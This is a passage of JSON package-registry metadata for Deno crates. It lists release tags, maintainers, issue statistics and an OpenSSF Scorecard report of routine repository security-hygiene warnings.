1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-07T20:59:30.445Z","dependent_packages_count":1,"downloads":58335,"downloads_period":"total","dependent_repos_count":2,"rankings":{"downloads":13.394981981369417,"dependent_repos_count":13.317204097833892,"dependent_packages_count":18.15597474766567,"stargazers_count":0.0022664944130912717,"forks_count":0.058173356602675974,"docker_downloads_count":null,"average":8.98572013557695},"purl":"pkg:cargo/deno-x86_64-apple-darwin","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno-x86_64-apple-darwin","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno-x86_64-apple-darwin","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno-x86_64-apple-darwin/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-07T13:25:49.747Z","issues_count":6659,"pull_requests_count":9671,"avg_time_to_close_issue":17134708.21400472,"avg_time_to_close_pull_request":1530358.8397069778,"issues_closed_count":3811,"pull_requests_closed_count":8053,"pull_request_authors_count":591,"issue_authors_count":2494,"avg_comments_per_issue":2.5029283676227663,"avg_comments_per_pull_request":0.7209182090786889,"merged_pull_requests_count":7031,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":681,"past_year_pull_requests_count":1194,"past_year_avg_time_to_close_issue":1348806.688034188,"past_year_avg_time_to_close_pull_request":1303670.810240964,"past_year_issues_closed_count":234,"past_year_pull_requests_closed_count":664,"past_year_pull_request_authors_count":193,"past_year_issue_authors_count":377,"past_year_avg_comments_per_issue":1.234948604992658,"past_year_avg_comments_per_pull_request":1.134003350083752,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":497,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1803,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1731,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":268,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":396,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"devsnek","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno-x86_64-apple-darwin/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno-x86_64-apple-darwin/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno-x86_64-apple-darwin/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno-x86_64-apple-darwin/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno-x86_64-apple-darwin/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno-x86_64-apple-darwin/codemeta","maintainers":[{"uuid":"28170","login":"ry","name":"Ryan Dahl","email":null,"url":"https://github.com/ry","packages_count":18,"html_url":"https://crates.io/users/ry","role":null,"created_at":"2022-11-07T18:29:40.804Z","updated_at":"2022-11-07T18:29:40.804Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/ry/packages"},{"uuid":"45082","login":"piscisaureus","name":"Bert Belder","email":null,"url":"https://github.com/piscisaureus","packages_count":12,"html_url":"https://crates.io/users/piscisaureus","role":null,"created_at":"2022-11-07T18:29:40.821Z","updated_at":"2022-11-07T18:29:40.821Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/piscisaureus/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":5307677,"name":"deno_napi","ecosystem":"cargo","description":"NAPI implementation for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":189,"first_release_published_at":"2022-10-05T14:15:14.962Z","latest_release_published_at":"2026-08-27T15:21:45.171Z","latest_release_number":"0.189.0","last_synced_at":"2026-09-07T22:54:32.267Z","created_at":"2022-10-05T14:25:30.078Z","updated_at":"2026-09-07T22:54:32.267Z","registry_url":"https://crates.io/crates/deno_napi/","install_command":"cargo install deno_napi","documentation_url":"https://docs.rs/deno_napi/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using 